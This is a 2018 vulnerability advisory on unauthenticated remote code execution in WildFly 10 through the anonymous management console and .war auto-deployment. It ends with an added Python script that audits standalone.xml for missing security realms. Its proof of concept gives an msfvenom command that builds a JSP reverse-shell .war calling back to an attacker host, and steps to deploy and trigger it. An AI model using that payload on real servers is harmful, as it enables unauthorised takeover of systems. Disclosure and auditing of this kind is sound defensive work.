exploit/CVE-2018-10682-CVE-2018-10683.txt
###############################################################
#
# WildFly Unauthenticated RCE through unprotected deployment
#
###############################################################
#
# Publication date: May 3rd, 2018
# Authors:
# Bourbon Jean-marie (kmkz) from Excellium-Services company | @kmkz_security
# Maia Anthony (Piosky) from Excellium-Services company | @Piosky1
#
# Product Homepage: http://wildfly.org/
# Source code download: https://github.com/wildfly/wildfly/tree/10.x
# Tested on:
# Name: WildFly Full
# Product version: 10.1.2.Final
# Profile: COMMUNITY
# HAL version: 2.8.27.Final
# Core version: 2.8.27.Final
#
###############################################################
# WildFly10 Manager Application Deployer Code Execution
# CVSSv3: 10 (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:N)
# OVE ID: OVE-20180502-0001
# CVE ID: CVE-2018-10682
###############################################################
#
###############################################################
# Server Allows -Privileged- Anonymous Authentication
# (through misconfiguration)
# CVSSv3: 7.2 (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N)
# OVE ID: OVE-20180112-0001
# CVE ID: CVE-2018-10683
###############################################################
## Fixes:
## No known fix yet
## Red Hat Security does not consider these to be security issues.
###############################################################
I. PRODUCT

WildFly is a flexible, lightweight, managed application runtime that helps you build (amazing) applications.
More information: http://wildfly.org/about/

II. ADVISORY

In a default installation where the management interfaces are defined without a security realm reference, a chain of weaknesses permits an attacker to perform remote code execution on the WildFly server without authentication.
This was based on the official documentation and permitted a successful compromise of the application server by combining the excessive rights of the anonymous user (administrator) with the .war deployment feature that is enabled by default:

"If either the http interface, the native interface or a remoting connection are defined without a security realm reference then they are effectively unsecured, in the case of the http interface this means that no authentication will be performed on the incoming connection - for the remoting connections however we make use of SASL so require at least one authentication mechanism so make use of the anonymous mechanism to allow a user in without requiring a validated authentication process."
Source: https://docs.jboss.org/author/display/WFLY10/Security+Realms

It occurs when the server's administrator performs a quick and dirty installation, which allows remote attackers to conduct unrestricted file upload attacks, and thereby execute arbitrary code, by using the /console and deployment feature.

Please note that we obtained two different CVE identifiers:

1 - Server Allows *Privileged* Anonymous Authentication (CVE-2018-10683):
** DISPUTED **:
NOTE: the Security Realms documentation in the product's Admin Guide indicates that "without a security realm reference" implies "effectively unsecured."
Our point of view:
An unprotected (no credentials) "anonymous" user that has maximum privilege (CWE-732) in WildFly should not be a feature.

2 - WildFly10 Manager's Application Deployment Code Execution (CVE-2018-10682):
** DISPUTED **
Our point of view:
As for Tomcat .war auto-deployment, the deployment feature on WildFly should not be executed automatically, especially for untrusted "anonymous" users.

These issues were discovered during a penetration test in a customer's infrastructure, then tested against multiple servers to validate them.

III. VULNERABILITY DESCRIPTION

Using the previously described misconfiguration, an attacker can access the WildFly administration panel on TCP port 9990 without any authentication, through the "anonymous" access (no password) that is automatically created if there is no security realm reference.
This account has too permissive access, since it results in administrator access on the server.
Once logged in, a misconfiguration present by default (auto-deployment) permits the anonymous user to deploy a malicious .war file, since auto-deployment is active by default, leading to remote code execution.
IV. PROOF OF CONCEPT

Perform a network scan to identify whether TCP ports 9990 and 8080 are open on the WildFly server.
If so, try to connect to it by simply accessing the management console http://target.com:9990/console/ (you should be logged in using the default "anonymous" account).
Generate a .war that contains your payload:
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<your-ip> LPORT=445 -f war > reverse-shell.war
Go to the "deployments" tab and drop it there in order to push the crafted .war file to the server; a message box should appear displaying "reverse-shell.war: successfully deployed" since auto-deployment is active by default.
Once automatically deployed, you can now access your .jsp file to execute the connect-back payload by simply calling the dedicated URL (prepare your listener first, of course):
http://target.com:8080/reverse-shell/reverse-shell.jsp
If you are lucky, it may run with "System\NT Authority" privileges, but if not, at least you have a shell on the vulnerable machine ;).

Note:
A project named "wildpwn" with a "Tomcat like" approach (/manager credentials brute force) written by Halil DALABASMAZ (@hlldz) was discovered by me a few days ago (a while after the CVE request/assignment) and could be adapted to easily exploit both CVE-2018-10682 and CVE-2018-10683.
Paper link: https://artofpwn.com/wildfly-exploitation.html
V. RECOMMENDATIONS

Add an authentication mechanism on each administration interface by default and restrict permissions for the anonymous user.
Only an admin user should be able to deploy .war files; disable auto-deployment by default.

VI. TIMELINE

January 9th, 2018: Vulnerability identification
January 12th, 2018: First contact with the editor (RedHat Security Team)
May 2nd, 2018: Reply with updated advisory
May 2nd, 2018: CVE request / CVE assigned
May 3rd, 2018: Writeup publication
May 8th, 2018: Public disclosure

VII. LEGAL NOTICES

The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
I accept no responsibility for any damage caused by the use or misuse of this advisory.
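The documentation quoted in section II and the first recommendation above come down to one configuration property: every management interface must reference a security realm, otherwise it is served anonymously. The following Python script, added here as an example and not part of the advisory or of WildFly itself, audits a standalone.xml for that condition. It assumes the WildFly 10 layout (a <management-interfaces> element holding <http-interface> and <native-interface>, each carrying a security-realm attribute that must name a realm declared under <security-realms>); the urn:jboss:domain:4.2 namespace and both XML documents embedded below are constructed samples, not real server files.

```python
"""Audit a WildFly standalone.xml for management interfaces that carry no
security realm reference (the misconfiguration described in the advisory).

Added example, not part of the advisory or of WildFly. Assumptions:
- the file follows the WildFly 10 standalone.xml layout, with
  <management-interfaces> holding <http-interface> / <native-interface>;
- the ``security-realm`` attribute is the realm reference the documentation
  refers to, so its absence means the interface is effectively unsecured.
Both XML documents below are constructed samples.
"""
import xml.etree.ElementTree as ET

# Constructed sample: "quick and dirty" install, http-interface without a realm.
WEAK_CONFIG = """<?xml version="1.0" ?>
<server xmlns="urn:jboss:domain:4.2">
  <management>
    <management-interfaces>
      <http-interface http-upgrade-enabled="true">
        <socket-binding http="management-http"/>
      </http-interface>
    </management-interfaces>
  </management>
</server>
"""

# Constructed sample: both interfaces reference a declared ManagementRealm.
HARDENED_CONFIG = """<?xml version="1.0" ?>
<server xmlns="urn:jboss:domain:4.2">
  <management>
    <security-realms>
      <security-realm name="ManagementRealm">
        <authentication>
          <local default-user="$local" skip-group-loading="true"/>
          <properties path="mgmt-users.properties" relative-to="jboss.server.config.dir"/>
        </authentication>
      </security-realm>
    </security-realms>
    <management-interfaces>
      <http-interface security-realm="ManagementRealm" http-upgrade-enabled="true">
        <socket-binding http="management-http"/>
      </http-interface>
      <native-interface security-realm="ManagementRealm">
        <socket-binding native="management-native"/>
      </native-interface>
    </management-interfaces>
  </management>
</server>
"""

# Management interface elements the documentation says need a realm reference.
INTERFACE_TAGS = {"http-interface", "native-interface"}


def _local_name(tag):
    """Strip the XML namespace so the check works for any urn:jboss:domain:* version."""
    return tag.rsplit("}", 1)[-1]


def find_unsecured_interfaces(xml_text):
    """Return a list of (interface tag, reason) findings.

    An interface without a security-realm attribute is reported as anonymous.
    An interface whose realm is not declared under <security-realms> is also
    reported, because that reference cannot resolve to an authentication setup.
    """
    root = ET.fromstring(xml_text)
    declared_realms = {
        el.get("name") for el in root.iter() if _local_name(el.tag) == "security-realm"
    }
    findings = []
    for el in root.iter():
        name = _local_name(el.tag)
        if name not in INTERFACE_TAGS:
            continue
        realm = el.get("security-realm")
        if realm is None:
            findings.append((name, "no security-realm attribute: anonymous access, no authentication"))
        elif realm not in declared_realms:
            findings.append((name, "security-realm '%s' is not declared" % realm))
    return findings


def audit_file(path):
    """Run the check against a standalone.xml on disk."""
    with open(path, "r", encoding="utf-8") as fh:
        return find_unsecured_interfaces(fh.read())


if __name__ == "__main__":
    import sys
    findings = audit_file(sys.argv[1]) if len(sys.argv) > 1 else find_unsecured_interfaces(WEAK_CONFIG)
    if not findings:
        print("OK: every management interface references a declared security realm")
    for tag, reason in findings:
        print("FINDING: <%s> %s" % (tag, reason))
```

Run it as `python audit_wildfly.py /path/to/standalone.xml` on each server; with no argument it checks the constructed weak sample and reports the missing realm on <http-interface>. The realm must be declared as well as referenced, since a dangling reference is no better than none. The documentation quoted in section II also names remoting connections; the same attribute check applies to the remoting subsystem's connector elements, which this example does not cover.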